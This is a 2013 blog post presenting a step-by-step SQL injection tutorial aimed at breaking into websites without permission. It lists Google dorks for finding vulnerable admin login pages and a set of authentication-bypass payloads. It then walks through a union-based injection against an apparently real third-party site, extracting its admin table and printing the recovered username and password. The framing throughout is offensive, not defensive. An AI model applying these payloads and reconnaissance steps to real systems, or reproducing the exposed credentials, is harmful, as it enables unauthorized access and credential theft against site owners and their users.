Home > June 2013

June 2013

My SQL Injection Complete Tutorial :)

Category : , 1

Hello every one .
I am going to share with one of the best of my tutorials here .

Now Let's begin!!

Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.

Things you should know :
Data is in the columns and the columns are in tables and the tables are in the database .
Just remember that so you understand the rest .

PART 1
Bypassing admin log in
Gaining auth bypass on an admin account.

Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection. 
here is the best:



Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :
ADMIN USERNAME :
PASSWORD :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections



Code:
' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'

So your input should look like this

username:Admin
password:'or'1'='1
that will confuse the site and give you authorisation to enter as admin

If the site is vulnerable than you are in Biggrin

PART 2
Finding Sites to Inject

Finding SQLI Vulnerable sits is extremely easy all you need to do is some googling. The first thing you need to do are find some dorks. 
Download SQLI dorks list from here : http://zyan.me/UVkJP

PS:I didn't put them in the thread because i passed count limit...
Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.
For example the url of the page you are on may look like this :



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10

To check that it is vulnerable all you have to do is add a '

So our link should look like that :

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=10'

Press enter and you get some kind of error. The errors will vary...

Our page should look like that :

Spoiler 
[Image: vulnerrorcopy.jpg]

After you find your vulnerable site the first step you need to take is to find the number of columns. The easiest way to do this is writing "order by " column number and we add "--" after the number.
Our link should look like that :



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--

If you get an error that means you should lower the number of columns .
Let's try 10.



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--

The page opened normally that means the number of columns is between 10 and 14.
We try now 11.



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--

The page opened normally too...
Let's try 12.



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--

We got error . That means the columns number is 11 because we got error on 12 and 11 opened normally .

Finding Accessible Columns 
Now that we have the number of columns we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10" replacing the " order by # " with "union all select " and columns number
Our link should look like that :



Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--

We should get numbers .

Our page should look like that :]

Spoiler 
[Image: vulncolumnscopy.jpg]

For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
These numbers are the colum numbers we can get information from. We will replace them later with something else so write them down if you want.

Getting Database Version
We found that column 8 , 3 , 4 and 5 are vulnerable so we will use them to get the database version .
Why Do We Do That?
If database is under 5 that means we will have to guess the tables names
To do that we need to replace one of the vulnerable columns by "@@verion"
Let's take column 8.
Our link should look like that :



Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

The page should look like that :]

Spoiler 
Image has been scaled down 12% (907x681). Click this bar to view original image (1024x768). Click image to open in new window.
Image has been scaled down 12% (907x681). Click this bar to view original image (1024x768). Click image to open in new window.
[Image: dbversioncopy.jpg]

In our case we got "5.0.77" its >5 so we can continue.

Now we need to get the table name we want to access :
To do it we need to replace "@@version" with "table_name" and add after the last columns number "from information_schema.tables" and add the "--" in the end .
Link should be like that:



Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

Page should look like that :]

Spoiler 
[Image: tablenamescopy.jpg]

Now we will search the table we want to access .
We should fine something with admin on it and in our case it's tbladmin


Spoiler 
[Image: tblhcopy.jpg]

Now we need to get the ASCII value of "tbladmin".
What is ASCII?
http://en.wikipedia.org/wiki/ASCII_value
Now to get the ASCII value of "tbladmin" go to that site : http://getyourwebsitehere.com/jswb/text_to_ascii.html


Spoiler 
[Image: acsii1copy.jpg]

Now enter in first box the table name wich is "tbladmin" in our case and click convert to ASCII.
You will get as value that :



Code:
tbladmin

Now remove the characters as & # ; and we add a comma "," between each number .
It should be like that:



Code:
116,98,108,97,100,109,105,110

Spoiler 
[Image: acsii2copy.jpg]

Now we replace in the URL the "table_name" to "column_name" and change "information_schema.tables" to "information_schema.columns and add "where table_name=char(ASCII value)--
in our case at place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like that :



Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

Our page should be like that:


Spoiler 
[Image: columnsmcopy.jpg]

Now we search for the columns named "username" and "password" or something like that .
In our case it is "username" and "password".
Now we can delete most of the URL .
Remove everything after the 11 and add : "from tbladmin" And replace "column_name" with "concat(username,0x3a,password)
0x3a is the ASCII value of a : so we can separate the username from the password.
Our URL should look like that:


Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

Our page should look like that :



Spoiler 
[Image: adminandpass.jpg]

And you're done the username is ishir and password ishir123
Some times password is encrypted with Hashes .
Use my HASH detector to know what it is and decrypt online.


And We're Done !

Powered by Blogger.